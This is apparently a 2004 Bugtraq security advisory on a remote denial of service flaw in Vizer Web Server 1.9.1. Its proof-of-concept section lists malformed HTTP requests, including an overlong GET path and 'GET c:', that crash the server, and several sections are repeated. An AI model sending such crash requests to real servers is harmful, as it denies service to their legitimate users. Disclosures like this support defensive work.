Vizer Web Server Remote Denial of Service Vulnerability
BID:9678
Info
Vizer Web Server Remote Denial of Service Vulnerability
| Bugtraq ID: | 9678 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 17 2004 12:00AM |
| Updated: | Feb 17 2004 12:00AM |
| Credit: | The disclosure of this issue has been credited to Donato Ferrante <[email protected]>. |
| Vulnerable: |
Vizer Web Server Vizer Web Server 1.9.1 |
| Not Vulnerable: | |
Discussion
Vizer Web Server Remote Denial of Service Vulnerability
It has been reported that Vizer Web Server may be prone to a remote denial of service vulnerability that may allow an attacker to cause the affected server to crash, denying service to legitimate users.
Vizer Web Server 1.9.1 has been reported to be affected by this issue.
It has been reported that Vizer Web Server may be prone to a remote denial of service vulnerability that may allow an attacker to cause the affected server to crash, denying service to legitimate users.
Vizer Web Server 1.9.1 has been reported to be affected by this issue.
Exploit / POC
Vizer Web Server Remote Denial of Service Vulnerability
No exploit is required.
The following proof of concept examples have been provided:
index.htm
( without specifying GET and HTTP )
or:
GET /aaaaaa[ 250 of a ]aaa HTTP/1.1
( specifying GET and HTTP )
GET /aaaaaa[ 250 of a ]aaa
( specifying only GET )
or:
GET c:( specifying only GET )
No exploit is required.
The following proof of concept examples have been provided:
index.htm
( without specifying GET and HTTP )
or:
GET /aaaaaa[ 250 of a ]aaa HTTP/1.1
( specifying GET and HTTP )
GET /aaaaaa[ 250 of a ]aaa
( specifying only GET )
or:
GET c:( specifying only GET )
Solution / Fix
Vizer Web Server Remote Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Vizer Web Server Remote Denial of Service Vulnerability
References:
References:
- Wizer Web Server Product Page (Vizer Web Server)
- Denial Of Service in Vizer Web Server 1.9.1 ("Donato Ferrante"